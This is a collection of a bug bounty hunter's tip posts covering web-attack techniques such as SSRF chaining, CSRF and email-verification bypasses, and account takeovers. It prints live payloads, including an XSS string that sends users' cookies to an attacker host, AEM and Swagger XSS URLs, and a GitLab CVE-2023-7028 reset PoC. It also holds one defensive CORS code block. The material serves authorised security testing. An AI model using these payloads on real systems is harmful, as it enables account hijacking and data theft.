Researcher in charge @ Ethical InfoSec Services | HackerOne Top 10 | hackerone.com/jayesh25

🕵️‍♂️Here's another secret no one will tell you about: A Simple WAF Bypass for Stored XSS that has earned me $$$$💰 so far! Stored XSS issues can fetch you rewards ranging from $500 to $7500, depending on the program. WAFs can pose significant challenges when hunting for Stored XSS vulnerabilities, but this simple trick can help you bypass them. By adding 'Content-Encoding: any_random_text' to the request header, you can deceive some WAFs, allowing your payload to slip through undetected. Enjoy the hunt! #bugbounty #securityTips #ethicalhacking #WAFBypass #hackerOne #bugcrowd #bugbountytips
🚨 Yay, we were rewarded with $20,000 on our @Hacker0x01 submission for an SSRF bug discovered in collaboration with @Shlibness! 💰🎉 🥳

We uncovered a Critical SSRF vulnerability, turning it into unauthorized access to internal admin endpoints, leading to PII leaks and administrative access! Here's how we escalated a simple SSRF to a $20,000 bounty. 💰🛡️

🔍 Step-by-Step Breakdown:
1️⃣ During our testing, we found an endpoint accepting a "url" parameter.
2️⃣ To confirm it was vulnerable to SSRF, we passed a Burp Collaborator URL and received an HTTP pingback, indicating a potential SSRF issue. ✅
3️⃣ We then attempted to escalate this issue by accessing localhost and AWS metadata.
4️⃣ It turned out the endpoint was part of an AWS Lambda function. By hitting http://localhost:9001/2018-06-01/runtime/invocation/next, we retrieved Lambda function details. 💡
5️⃣ At this point, there were no sensitive credentials or information leaked. But since the SSRF allowed partial read, we wondered: "What if we could access internal services whitelisted for this Lambda?" 🤔
6️⃣ Next, we identified two categories of targets across all subdomains:
Externally resolving but not directly accessible via HTTP
Internally resolving and obviously not accessible via the Internet 🌐
7️⃣ We used Shub's @infosec_au Surf tool (github.com/assetnote/surf) for discovering potential internal targets and found 5000+ viable subdomains that were inaccessible from the internet. 🎯
8️⃣ Chaining the SSRF further, we searched for Swagger endpoints on all these targets identified by the surf tool. We ended up looking for endpoints like:
http://<internalhost>/swagger-ui/swagger.json
http://<internalhost>/api/v1/api-docs
http://<internalhost>/api/v2/api-docs
etc.
We discovered that the Lambda function had whitelisted access to internal hosts exposing Swagger API documentation. 🚀
9️⃣ The Swagger docs revealed administrative endpoints. Chaining the SSRF again, we accessed these internal API endpoints, leading to PII leaks and unauthorized access to other internal administrative functionalities. 🔓

⚠️ Impact: This vulnerability allowed attackers to access internal administrative endpoints, leaking PII and exposing other critical business risks. 🚨

💡 Lesson Learned: Don't stop at confirming SSRF! Always think outside the box and explore ways to escalate for maximum impact. Creativity wins the game! 🧠✨

#BugBounty #HackerOne #BugCrowd #YesWehack #Intigriti #bugbountytips #security
Bug Bounty Tips: Penetration Testing Android/iOS Apps? 📱

Today, I'd like to introduce a valuable open source tool that I frequently rely on: Mobile Security Framework (MobSF), an all-in-one mobile app pen-testing and security assessment tool. It works seamlessly with various mobile app formats, and offers dynamic analysis capabilities. The best part? You can try it out without installation! Experience MobSF directly at mobsf.live. If you prefer to install and run your own local version, you can do so via github.com/MobSF/Mobile-Secu….

While MobSF offers a range of features, here's the list of things I use it for:
📥 Easy to use: Easily analyze your APK with straightforward drag-and-drop functionality, eliminating the need for multiple tool installations. This is specifically good for beginners because they don't have to rely on complex installation of 5 different tools for testing an app.
🔑 Identifying Hardcoded Secrets: The tool helps flag hardcoded credentials, aiding in validation and reporting. I've had some quick wins through this module with sensitive tokens/API keys disclosed.
☕ Reviewing Java Source Code: I mostly use it to examine Java source code for my target, uncovering API endpoints, design flaws, or reverse engineering possibilities to overcome jailbreak detection, etc.
🕵️ Reverse Engineering: It helps with reverse engineering, including decompilation, disassembly, and debugging.
🔄 Dynamic Analysis: It integrates with Genymotion to inspect HTTP traffic while navigating through the app, effectively detecting endpoints. I use it at times to get a quick idea of what HTTP calls are being made when initially navigating through my target.

It's worth noting that I still use other tools like Burp Suite, MITM, and Charles Proxy. However, I usually run my target apps through MobSF first as it gives me a nice overview of the target and some quick wins. Give it a try and enhance your mobile app security assessments! 💪🔍

#BugBounty #MobileSecurity #PenTesting #Cybersecurity #HackerOne #BugCrowd #InfoSec #BugBountyTips
🔐Secrets no one will share with you - Here's a technique that might grant you access to take over other users' accounts using "Login with Facebook":

Are you working on a target site that supports "Login with Facebook"? Disable email sharing during Facebook login and be ready for unusual design flows that could enable you to take over other users' accounts.

Here's how to disable email sharing when using "Login with Facebook":
1️⃣ Log in with Facebook on any app.
2️⃣ Click "Edit Access."
3️⃣ Uncheck the email address checkbox.
4️⃣ Click Continue.

Here are some scenarios of account takeovers I've reported based on different target app behaviors:

Account Takeover via Linking Facebook Flow:
1️⃣ Went to http://example[.]com, used "Login with Facebook" (Uncheck share email on Facebook).
2️⃣ The target site asked to enter an email to link my FB account as no email was shared from FB. Entered victim@example.com; a confirmation link was sent to the victim's email to bind the account.
3️⃣ Repeated the same steps on the target site using the same FB account, this time choosing to link attacker@example.com on the target site – received the same link as in step (2) on the attacker-controlled email!
4️⃣ Knowing this, repeated the same steps again to link victim@example.com, and used the earlier link which was received on attacker@example.com to take over the victim@example.com account.

Direct Account Takeover via Login with Facebook:
1️⃣ Went to http://example[.]com, used "Login with Facebook" (Uncheck share email on Facebook).
2️⃣ The target site prompted me to enter an email to link the FB account to an existing account since no email was shared from FB. Entered victim@example.com. It directly logged me into victim@example.com without any further verification, leading to a complete account takeover.

Pre-Account Takeovers:
Do you have a target app that heavily relies on a user's email domain to grant access to organizations or critical features based on whitelisted domains? Using this technique can help you bypass email verification requirements, allowing you to claim any email. Consequently, you may be able to access critical features of other organizations permitted for emails with the same domain.

Lesson: Always test unusual login flows by logging in with a 3rd party provider without sharing email with the target site. These designs can be flawed and lead to nice bounties! 💰

#BugBounty #CyberSecurity #HackerOne #bugcrowd #securitytips #bugbountytips
Quick Wins: If you come across an outdated Swagger instance, always remember to test for XSS vulnerabilities. Try these payloads and earn some quick bounties!
http://example(.)com/swagger-ui/index.html?configUrl=https://jumpy-floor.surge(.)sh/test.json
http://example(.)com/swagger-ui/index.html?url=https://jumpy-floor.surge(.)sh/test.yaml
http://example(.)com/swagger-ui/index.html?configUrl=https://xss.smarpo(.)com/test.json&url=https://jumpy-floor.surge(.)sh/test.yaml

Always try escalating these issues to an Account takeover to earn a 'High' severity payout.

#EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure
🤔Question of the day: How to Spot CORS Misconfigurations?

It is almost the year 2024, yet I continue to discover CORS misconfigurations, adding $$$ to my bug bounty earnings each month. Here's my approach to finding CORS issues:
1️⃣ Nuclei Scan - Identify vulnerable targets with the cors-misconfig.yaml nuclei template using the command nuclei -u http://target -t cors-misconfig.yaml. You can find the template at github.com/projectdiscovery/…
2️⃣ Manual Approach - If you're manually hunting on a target app and believe that specific GET/POST/PATCH/PUT/DELETE endpoints were missed by nuclei, add an Origin header to your requests with null or your attacker site. Check the response headers for Access-Control-Allow-Origin: <your_arbitrary_origin> or <null> and Access-Control-Allow-Credentials: true.
3️⃣ Craft your POC - To ensure your report doesn't get closed as "Informative" or "NA," provide a working PoC. Here's JavaScript code I host on my attacker-controlled server to demonstrate CORS misconfiguration on a sensitive endpoint:

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
  // Fires once the cross-origin response has been fully received.
  if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
    alert(xhr.responseText);
  }
};
// Credentialed cross-origin read: the browser only exposes the body if the
// target reflects the Origin and sets Access-Control-Allow-Credentials: true.
xhr.open('GET', 'http://targetapp/api/v1/user', true);
xhr.withCredentials = true;
xhr.send(null);

Takeaways: Always include CORS misconfig-specific checks in your bug hunting checklist. Many target apps are still vulnerable to these issues, which can lead to a high severity payout.

#BugBounty #WebSecurity #InfoSec #CORSMisconfigurations #HackerOne #BugCrowd #BugBountyTips
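The server-side origin check that step 2 above is probing, written the two ways it usually goes wrong and then hardened, plus the detection condition as a function a scanner or CI test can run over response headers. This is an added Node.js example, not the author's code; the function names and the allow-listed hosts are constructed for the illustration.

```javascript
// Constructed allow-list: the only origins permitted to make credentialed reads.
const ALLOWED_ORIGINS = new Set([
  'https://app.targetapp.example',
  'https://admin.targetapp.example',
]);

// Pattern 1: reflect whatever Origin arrives. Any attacker site, and the literal
// "null" origin (sandboxed iframes, data: URLs), gets a credentialed response.
function checkOriginReflect(origin) {
  if (!origin) return null;
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// Pattern 2: "ends with our domain" looks like an allow-list but also matches
// attacker-targetapp.example and https://evil.example/targetapp.example.
function checkOriginSuffix(origin) {
  if (origin && origin.endsWith('targetapp.example')) {
    return {
      'Access-Control-Allow-Origin': origin,
      'Access-Control-Allow-Credentials': 'true',
    };
  }
  return null;
}

// Hardened: exact match against a closed set, never "null", and Vary: Origin so
// a shared cache cannot hand one origin's ACAO header to another.
function checkOriginHardened(origin) {
  if (typeof origin !== 'string' || origin === 'null') return null;
  let parsed;
  try { parsed = new URL(origin); } catch (e) { return null; }
  const normalised = parsed.origin;   // scheme://host[:port], default port dropped
  if (!ALLOWED_ORIGINS.has(normalised)) return null;
  return {
    'Access-Control-Allow-Origin': normalised,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Detection: the condition the post describes, evaluated on a response's
// (lower-cased) headers for the Origin that was sent. ACAO "*" with
// credentials is refused by browsers, so it is not flagged.
function isCorsMisconfigured(sentOrigin, headers) {
  const acao = headers['access-control-allow-origin'];
  const acac = headers['access-control-allow-credentials'];
  if (acac !== 'true') return false;
  return acao === sentOrigin || acao === 'null';
}
```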
Bug Bounty Tips: 🐛💰 Here's a simple bug bounty tip for shopping site targets that can earn you some serious $$$$. I've stumbled upon 10+ similar issues on shopping sites that allow guest checkouts 🛒. Many overlook these issues because they require placing an order 📦. However, some services support cash on delivery 💸 or allow you to place a cheap order and then cancel it for a refund 🔄, making it worth adding to your checklist if other prerequisites are met.

Here's what to look for:
1️⃣ Target app that permits guest orders without creating an account 🕵️‍♂️
2️⃣ Target app doesn't require email verification for new account creation, or you've found an email verification bypass on sign-up 📧🔓

If these prerequisites are met, you can often find target apps with a misconfiguration that lets you access a guest user's order history by creating a new account with the same email used for the guest order. Here's how it usually goes down:
1️⃣ Place an order on the site as a "Guest" and use the victim's email during checkout, e.g., victim@example.com 📩
2️⃣ The victim receives an email with the receipt 📧
3️⃣ As an attacker, sign up using the email victim@example.com assuming there's no email verification 🧑‍💻
4️⃣ Navigate to the account's order history page, and you might strike gold 🪙 by finding the previously made orders, leading to Order History and PII leaks 🔍📜

Takeaways: Don't ignore workflows involving payments; you might discover workarounds like cheap payments or cash on delivery 💡💳. Test for unusual flows and be ready for pleasant surprises with some lucrative bounties 💰💎

#BugBounty #CyberSecurity #HackerOne #BugBountyTips #SecurityTips #Bounties #infosecurity
Hunting on a target with a Salesforce site? 🕵️‍♂️ You're in luck! 🍀 There's a high likelihood of stumbling upon a misconfigured object that could yield bounties ranging from $1,000 to $5,000 due to the sensitive nature of the data. 😲 Don't be fooled; many hunters overlook these targets, assuming they're safe behind a login page. 😅 However, they're actually one of the most common issues I encounter.

Here's a simple approach to spot these vulnerabilities:
1️⃣ Install this amazing tool - 🔧 github.com/moniik/poc_salesf…
2️⃣ Run python3 exploit.py -u https://{{target(.)com -d -s
3️⃣ The tool will automatically scan for object misconfigurations and display objects with result counts.
4️⃣ Found any interesting objects with a result count >0? 🧐
5️⃣ You can explore further in this nice article - 📖 infosecwriteups.com/in-simpl… to exploit the misconfiguration.

Hope this helps you on your bug bounty journey. 🚀 Enjoy! 🤑

#CyberSecurity #SecurityTips #BugBountyTips #HackerOne #BugCrowd #DailyTips #Bounties #Bounty
Bug Bounty Tips: Uncover misconfigured Google Drive links, open S3 buckets, interesting APIs, secrets, and other sensitive files with JSLuice! 🔍

JSLuice is a powerful Go package and command-line tool for extracting URLs, paths, secrets, and intriguing data from JavaScript source code. Find it at github.com/BishopFox/jsluice 🚀

Here's my approach to using this tool:
1️⃣ Collect URLs from Katana and Waymore, then filter out .JS files.
2️⃣ Download those JS files using wget or curl and run JSLuice on them.
3️⃣ Filter the URLs extracted by JSLuice using keywords like Firebase, Amazon, CloudFront, Google Drive, etc. Manually investigate the results for bucket/cloud misconfigurations and report them for quick wins.
4️⃣ Repeat this process for other interesting API endpoints, hardcoded credentials, and valuable data within JavaScript source code. You can even create custom scripts to monitor JS files for changes, like new links, secrets, APIs, and more.

Learn more about this exceptional tool and its usage here:
bishopfox.com/blog/jsluice-j…
bishopfox.com/blog/jsluice-j…

Level up your bug bounty game! 🐛💰

#BugBountyTips #HackerOne #BugCrowd #SecurityTips #InfoSec #JSLuice #BountyHunting
🔍Question of the day: Where to find SSRF Issues?

Many overlook testing for SSRF vulnerabilities, thinking they're complex and beyond their capabilities. 💻💔 However, these issues can lead to bounties ranging from $1000 to $15000, depending on the impact. These are the top 5 obvious features I look for in a target app to find SSRF issues:
1️⃣ Export to PDF - Does your target app support generating PDFs? 📄 Try injecting HTML into the content that is used for generating that PDF. If vulnerable to HTML injection, you might strike gold by injecting HTML/JS.💰
2️⃣ Integrations - If your target app supports a webhook integration feature, replace the URL with your Burp Collab and wait for a hit. 🔄
3️⃣ Import via link feature - Does your target app support importing files or websites via a link? 📥 Specify your attacker Burp Collab and check for a hit, especially when uploading profile pictures or media through a library.
4️⃣ Host Header - Test for routing-based SSRF by supplying your Collaborator server domain in the Host header. If you receive a DNS lookup from the target server, you might be able to route requests to arbitrary domains🌐
5️⃣ File Upload - Does your target app support uploading files? 📂 Try uploading an HTML file; if rendered and executed on the server-side, you might strike gold. No luck? Try an SVG with an SSRF payload. If that fails, move on to the next!

None of the above methods worked? Don't worry; we have more tricks up our sleeves, and we'll be sharing them soon! 🧙‍♂️

Takeaways: Note these features, and if you encounter them in your target app, don't forget to test for SSRF issues. Who doesn't love some free money while securing the planet? Stay tuned for more! 💸🌍

#cybersecurity #bugbountytips #securitytips #bugcrowd #hackerone #tips #bounty
🐛Bug Bounty Tips: Using "Waymore" to discover more security issues🌐

In the bug bounty world, having the right tools is essential. While there are many useful ones like waybackurls and gau, let's focus on "waymore" from @xnl_h4ck3r today. It's a handy tool for finding archived URLs, and it can give you an advantage when hunting for bugs. 🕵️‍♂️

Why "waymore"? It's my favorite tool for deep investigations. Whether I'm exploring a specific target or a new area, "waymore" helps me collect ALL the archived URLs I need.

Here's where "waymore" gets its data:
📜 Wayback Machine (web.archive.org): It stores old versions of websites, which can be a goldmine.
🌐 Common Crawl (index.commoncrawl.org): This resource has a massive amount of web data.
🛸 Alien Vault OTX (otx.alienvault.com): It offers threat intelligence, including valuable URL data.
🔎 URLScan (urlscan.io): This service scans and analyzes websites, giving you crucial insights.

Now, let's dive into using "waymore":

Installation is straightforward:
git clone https://github[.]com/xnl-h4ck3r/waymore.git
cd waymore
sudo python setup.py install
sudo pip3 install -r requirements.txt

Once it's set up, you can run "waymore" on your target like this:
python3 waymore.py -i target[.]com -mode U

If you want to go deeper, use -mode R to download all archived responses. This sets the stage for local analysis, where you might uncover hidden treasures like passwords or forgotten APIs. 💎

But what's next in your bug bounty journey? 🤔
1️⃣ One-Liner Magic: Check out this list of one-liners at github.com/dwisiswant0/aweso…. You can apply these to your "waymore" dataset. With a bit of automation, you'll be surprised by the results! 🚀
2️⃣ Testing Tools: Use tools like dalfox, try out nuclei templates, and other XSS detection methods to find vulnerabilities like XSS, SQLI, SSTI, and more.
3️⃣ Custom Searches: Create your checklist for specific keywords like "user," "admin," "orderId=," "id=," "login," "signup," and others. Tailor your searches to what matters most.
4️⃣ Dive into JS: Look at .JS (JavaScript) files, find API endpoints, and test them for issues like IDORs, information leaks, or hardcoded credentials. The details matter.

And if you haven't found any bugs yet? 🤷‍♂️ Don't worry; there are many creative paths to explore within this dataset. Stay tuned for more insights!

Key Takeaways: Gathering URLs is your secret weapon in bug bounty hunting. Always include testing archived URLs in your research and testing methods – you'll be amazed at what you discover. 🚀

#BugBounty #InfoSec #Cybersecurity #HackerOne #BugCrowd #BugBountyTips
Bug Bounty Tips: Discovering the Origin IP by scanning your target IP range🕵️‍♂️

When you're hunting on a bug bounty target and a WAF stands in your way, here's a powerful technique to uncover the Origin IP by scanning the target's IP range. We'll be using a simple yet effective tool called hakoriginfinder by hakluke! Get it at github.com/hakluke/hakorigin…

Here's my methodology to find the Origin IP using this tool and technique:
1️⃣ Discover your target's ASN and check bgp.he.net/AS33848#_prefixes
2️⃣ Make a note of the target's IP range.
3️⃣ Assuming you have a WAF-protected domain called example[.]com, use this command with the IP range identified in step 1 and pass your target host against the -h parameter:
prips 93.184.216.0/24 | hakoriginfinder -h example[.]com

If you receive a "MATCH" output, there's a strong likelihood that you've successfully identified the Origin IP. Now, you can send requests with the same Host header to bypass the WAF or for whatever your mission requires. Happy hunting! 🎯💻

#BugBounty #InfoSec #Hacking #Cybersecurity #HackerOne #BugCrowd #BugBountyTips
🔍 Bug Bounty Tips: Crawling parameters with Katana for quick XSS/SQLI wins! 🚀

When it comes to efficient bug hunting, active crawling can be a game-changer. One of the tools I rely on is Katana, which helps retrieve URLs and parameters for thorough testing against XSS, SQLI, SSTI, and more.

👉 Here's a one-liner that kicks off the process:
katana -list targets.txt -silent -d 6 -rl 25 -jc -f qurl

🔑 What's the next step? Take the URLs you've obtained from active crawling and include them in your XSS, SQLI, and SSTI checks. This strategy broadens your attack surface, making it easier to spot vulnerabilities and secure those quick wins.

💡Takeaways: Leveraging Katana's capabilities can help you uncover hidden issues efficiently and bolster your bug bounty earnings. Happy hunting! 💻💰

#BugBounty #Cybersecurity #Katana #XSS #SQLI #SSTI #Infosec #Bugbountytips #HackerOne #BugCrowd
🔐 Bug Bounty Tips: Reported 15+ XSS issues on a broad-scoped program leveraging AEM! 🚀

If you stumble upon a target app using AEM, make sure to use these XSS payloads for some quick wins! 💰
1️⃣ https://target[.]com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target[.]com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3️⃣ https://target[.]com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html

Always try to escalate these issues to an Account Takeover for the chance at a 'High' severity payout. Stay vigilant! 🕵️‍♂️💡

#EthicalHacking #BugBounty #SecurityTips #Cybersecurity #StaySecure #HackerOne #BugCrowd #BugBountyTips
Bug Bounty Tips: Working on a target app that requires an international phone # for sign up? 📲🌏

Don't let international phone number requirements stop your bug bounty journey! Here are my top 3 favorite services for receiving SMS online to tackle these targets:
1️⃣ https://receive-sms[.]cc - Swift and efficient, it covers the US, UK, and more, receiving SMS almost instantly.
2️⃣ TextNow Android App - Get a dedicated phone number for free using the TextNow Android App. Install it from play.google.com/store/apps/d… and enjoy seamless SMS and phone call reception.
3️⃣ https://onlinesim[.]io/ - This service lets you purchase or rent dedicated phone numbers for specified durations, capable of receiving SMS from any service.

Don't overlook targets demanding an international phone number for sign-up/login; they often hold juicy opportunities for discovering authentication bugs and earning bounties! 🌐🔐

#BugBounty #InfoSec #Hacking #Cybersecurity #SMSVerification #BugBountyTips #HackerOne #BugCrowd
🔍 Question of the day: Which tools are your go-to choices for bug bounty automation? 1) amass 2) subfinder 3) github-subdomains 4) findomain 5) assetfinder 6) securitytrails 7) Rapid DNS 8) crt(.)sh 9) dnsx 10) massdns 11) puredns 12) httpx 13) naabu 14) RustScan 15) katana 16) hakrawler 17) wayback 18) gau 19) waymore 20) nuclei 21) Intelx 22) Short Name Scanner 23) axiom 24) ShadowClone 25) anew 26) qsreplace 27) chaos 28) notify 29) ffuf 30) gotator 31) gowitness 32) dorks_hunter 33) dehashed 34) dirbuster 35) LinkFinder 36) Param Miner 37) Arjun 38) clairvoyance 39) sqlmap 40) Ghauri 41) XSStrike 42) dalfox 43) dnsReaper Let me know if I've missed out on any other important ones :) #BugBountyTips #HackerOne #BugCrowd #SecurityTips #InfoSec #CyberSecurity
🔒Sharing more secrets - It's 2023, and CSRF issues are far from extinct. In fact, I've discovered and reported 100+ CSRF vulnerabilities this year, raking in five figures $$$$$!💰

🚀 My top 5 CSRF bypass techniques and their secrets to success:
1️⃣ Swap "POST" with "GET": Instead of using POST requests, switch to GET and move the body parameters into the URI. This simple maneuver often overrides CSRF token implementations, enabling a full-blown CSRF attack.
2️⃣ JSON Requests: Even JSON requests relying on cookies can be vulnerable to CSRF. Here's the trick: send your request with a content-type of text/html and format the body in JSON. In some cases, if the application doesn't rely on the content-type header, CSRF can still work its magic.
3️⃣ Don't Blindly Trust CSRF Tokens: Just because an application has a CSRF token doesn't mean it's foolproof. Sometimes, backend validation for these tokens can be flawed. This means that even with the same token, a CSRF attack may still work on other users' accounts.
4️⃣ Remove the CSRF Token Parameter: Believe it or not, some applications are designed to support legacy versions. If you try removing the CSRF token parameter from the request, it may still work. This is often because apps have dual implementations, and if the parameter is missing, they fall back to the legacy version to support older versions of the app, which can often be vulnerable.
5️⃣ Legacy Endpoints: Hidden in JS files are legacy endpoints that may no longer be actively in use, but they can still be functional and vulnerable to CSRF attacks. These abandoned endpoints are usually not maintained or updated to the latest security standards, making them prime targets for CSRF exploitation.

🎯 Lesson: CSRF issues are not to be underestimated. They are often hiding in plain sight, waiting to be discovered, and they can offer substantial bounties. Happy hunting, and enjoy the rewards! 💎💻

#Cybersecurity #CSRF #BugBounty #InfoSec #hackerone #bugcrowd #cybersecuritytips #securitytips 💰💡
💰Bug Bounty Tips: Scored a $5,000 bounty via APIs exposed on a Swagger endpoint! 💻

Discovered a Swagger UI showing API endpoints—all endpoints required auth. Instead of stopping there, I tried something different: using an Authorization token and cookies from a different subdomain of the target. To my surprise, the Authorization token from a different service worked, unlocking internal APIs that exposed sensitive PII, allowing me to delete users' data, and more! 🚨

Takeaway: Don't limit yourself to XSS/HTML Injection on Swagger endpoints. Test all API endpoints using Auth tokens or cookies from other subdomains—you might get lucky!

#API #BugBounty #Security #HackerOne #BugCrowd #Recon #Intigriti #YesWeHack
Bug Bounty Tips: 🐛🔐 Unlocking Important Resources with Email Verification Bypass

Working on a target where email verification is crucial? Imagine a scenario where gaining access to a specific domain, like example[.]com, could grant you entry into a victim's workspace, allowing you to view documents and other content associated with that whitelisted domain. Often, email verification bypass issues are reported without demonstrating real-time impact or as pre-account takeovers. Consequently, many of these submissions get marked as "Informative." Here's my approach to showcasing the impact of these issues:

Identify Features Dependent on Email Domain: Identify critical features linked to a user's email domain. For instance, consider a target app that grants access to resources based on your email domain. Some apps let you join a team or workspace directly if your email matches the team's domain (e.g., join Victim SITE XYZ only with sample@victimsitexyz[.]com). Others restrict access to documents or videos based on email domain whitelisting. Numerous such opportunities exist where email plays a crucial role.

Here's a simple trick that often works to bypass email verification and claim an unregistered email on any domain:
1️⃣ Log in to your attacker account and change your email address to an attacker-controlled email (e.g., attackeremail@attackerdomain.com).
2️⃣ You'll likely receive an email confirmation link on your attacker-controlled email (do not verify it yet).
3️⃣ Now, change your email to the unregistered email or domain you wish to HIJACK (e.g., victimemail@victimdomain.com).
4️⃣ This action will send an email verification link to victimemail@victimdomain.com, which you don't have access to.
5️⃣ Try clicking on the "Email" verification link sent earlier to attackeremail@attackerdomain.com.

If the system fails to revoke the previous email verification link, the link for attackeremail@attackerdomain.com could end up verifying the email for victimemail@victimdomain.com, allowing you to claim it as verified. Once you've claimed an email associated with another organization's domain, identify the associated functions to prove impact and report it to earn some generous bounties! Numerous similar misconfigurations exist that you can leverage to bypass email verification checks.

Takeaways: Don't report email verification issues without demonstrating actual impact. Apps that support organizations/workspaces with multiple roles often rely on a person's email domain, making them valid candidates for showcasing security impact. 💡🛡️

#BugBounty #Cybersecurity #HackingTips #HackerOne #BugCrowd #BugBountyTips #SecurityTips
Bug Bounty Tips: Extract API Endpoints and Construct Complex HTTP Requests from JavaScript Files Using AI Stuck analyzing complex JS files while manually hunting on a target and can't figure out how to construct those GET/POST requests? 🤯 No fancy tools needed! 👉 Quick tip: Copy the JS file from your Chrome Dev Console, save it locally, and upload it to ChatGPT. Use this prompt: "Could you read this JavaScript file and help me construct GET/POST endpoints?" Then, ask for specific requests like: "Can you help me construct the API request for getUserDetails with a raw HTTP example based on the JavaScript file uploaded?" and other similar questions based on the functionality you're looking into within the JavaScript source code. You’ll be amazed by the results as ChatGPT constructs these complex GET/POST requests with parameters based on the AI code review—making what seemed impossible at first glance possible! 🚀 Once you have this information, you can start manually testing the endpoints with your cookies to test for IDORs, SQLi, CSRF, Privilege Escalations, XSS, etc. #BugBountyTips #SourceCode #Infosec #HackerOne #BugCrowd 🕵️‍♂️🎯
🔍GitLab CVE-2023-7028 - Uncover account takeover potential with a simple password reset method.

Known POC:
user[email][]=valid@email.com&user[email][]=attacker@email.com

Identifying vulnerable targets:
1️⃣ Utilize the nuclei template at github.com/projectdiscovery/… to spot exposed GitLab instances.
2️⃣ Hunt for potentially valid victim org emails through various sources. An effortless choice is app.snov.io/domain-search?na….
3️⃣ Install and execute the Python script found at github.com/RandomRobbieBF/CV… on these hosts. If the target is vulnerable, you'll likely receive an email on your attacker-controlled server.

Usage:
CVE-2023-7028.py [-u URL] -v victim@example[.]com -a attacker@wearehackerone[.]com

#BugBountyTips #HackerOne #BugCrowd #Security #InfoSec #SecurityTips
🔐💰 Question of the day: "How to Maximize Payouts with XSS Vulnerabilities"🤑

Learn from my past mistakes! In my early days, I reported over 50 XSS issues, but I missed out on maximizing their impact, resulting in bounties that were only a fraction of what I could have earned. Bounties for 'High' severity XSS issues can range from $1,000 to $20,000. 💸

Here's a strategy to escalate XSS vulnerabilities and boost your payouts:
1️⃣ Always aim to turn XSS vulnerabilities into account takeovers. Here's a simple payload you can use to demonstrate ATO:
"><img src="x" onerror="document.location.href='https://attackersite(.)com?cookies=' + document.cookie + ''">
This payload exfiltrates user cookies and forwards them to an attacker-controlled site. Create a Proof of Concept (PoC) video showing how these cookies can hijack a user's session, e.g. send a request to any authenticated API and demonstrate that the cookies work. This will earn you a 'High' severity bounty.
2️⃣ If cookies are set as HttpOnly, don't worry. Elevate the impact by performing sensitive client-side actions, such as changing a user's email address or password, and escalate it to an account takeover.
3️⃣ If sensitive client-side actions aren't possible, check for leaked session cookies or tokens in the server's responses on all pages. Use your XSS payload to exfiltrate these and escalate to an account takeover.
4️⃣ If no session cookies or tokens are found on any pages, examine the browser's local storage for stored session tokens and exfiltrate them to escalate to an account takeover.
5️⃣ If none of the above methods work, stay tuned for more tips! 😄

🚀Common mistakes to avoid: Reporting XSS as simple "Medium" risk issues without maximizing their impact. Don't underestimate their potential. Always seek ways to escalate XSS issues to account takeovers for substantial bounties! 💡

#BugBounty #InfoSec #xss #crosssitescripting #Cybersecurity #BugBountyTips #HackerOne #BugCrowd #SecurityTips #QuestionOfTheDay
🔒 Question of the day: How to hunt on restricted web applications protected behind a login page? 🤔
Well, guess what? While most folks tend to overlook these targets, I've pocketed over 5 figures $$$$$💰 from such apps. Bounties for findings on these assets often result in generous High/Crit payouts, ranging from $2,000 to $10,000. 💸
Here's a rundown of what you can do to uncover issues with such targets:
1️⃣ Response Manipulation: Create a "match and replace" rule in Burp Suite to swap "false" with "true" and 403/401 status codes with 200. After this, try accessing the app and log in with an incorrect password while keeping Burp Suite active. 🛡️ This trick can often reveal whether the app relies on client-side validation for such apps, potentially granting unauthorized access due to lack of server-side authorization checks.
2️⃣ Brute Force: Test common username/password combinations. Many such apps use predictable credentials, like admin:admin, admin:password, etc.
3️⃣ SQL Injection: Perform SQL Injection on the login for these targets using tools like SQLMAP or Ghauri. It may take some time, but since it's just a single request, it's definitely worth a shot. Prepare to be amazed by the results! 😲
4️⃣ JS endpoints: Review all exposed JS files on the page and extract endpoints using JSBeautify/LinkFinder. Often, you'll discover APIs that are vulnerable to IDOR/Information disclosure, even without authentication, potentially leading to nice bounties.
5️⃣ Directory Fuzzing: Utilize FFUF or equivalent tools to fuzz for directories. You can find excellent wordlists at wordlists.assetnote.io, tailored to the web application's underlying technology.
6️⃣ Breached Credentials Services: Many people employ these services to search for org employees or other credentials linked to the target. If found, they often test them to access the admin page and report the findings (Note - not all programs accept this).
7️⃣ Wayback: Always check for archived URLs related to the target, as they may reveal accessible paths without authentication, providing direct access to the dashboard.
There are many more tricks to get around such target apps. We'll talk more in detail with specific examples in future tweets.
🚀Lesson: Do not ignore these types of apps, as they are often a goldmine! 🕵️‍♂️🌐
#Cybersecurity #BugBounty #WebSecurity #hackerone #bugcrowd #securitytips #questionoftheday #bugbountytips #earn #bounties
🐞Bug Bounty Tips: Looking for an all-in-one reconnaissance tool for your bug bounty automation game? Are you finding it challenging to allocate time for automating your bug bounty efforts and seeking a pre-built solution? 🕵️‍♂️
Look no further! Let me introduce you to "reNgine," a tool I personally love for its robust features and user-friendly interface. reNgine, an exceptional open-source tool, offers a powerful solution to automate your bug bounty efforts. With its robust features and user-friendly interface, it simplifies the reconnaissance phase, making it a must-have for bug hunters.
Features It Automates:
1️⃣ Subdomain Discovery
2️⃣ IP and Open Ports Identification
3️⃣ Endpoints Discovery
4️⃣ Directory/Files Fuzzing
5️⃣ Screenshot Gathering
6️⃣ Vulnerability Scanning
7️⃣ Nuclei
8️⃣ Dalfox XSS Scanner
9️⃣ CRLFuzzer
And More...
Key Highlights:
🚀 Highly Customizable Engines
🔄 Continuous Monitoring
📊 Recon Data Visualization
🧠 GPT Vulnerability Description
🌐 OSINT Capabilities
🛠️ Toolbox with Essential Tools
📈 Advanced Query Lookup
📣 Customizable Alerts
📝 Recon Notes and Todos
🔄 Periodic Scans
📷 Screenshot Gallery
You can learn more about the tool and find the Installation Instructions at github.com/yogeshojha/rengin…
Unlock the potential of your bug bounty journey with reNgine's automated insights. It's time to level up! 🚀
#BugBounty #Reconnaissance #CyberSecurity #HackingTools #InfoSec #HackerOne #BugCrowd #BugBountyTips #BugBountyAutomation #Rengine
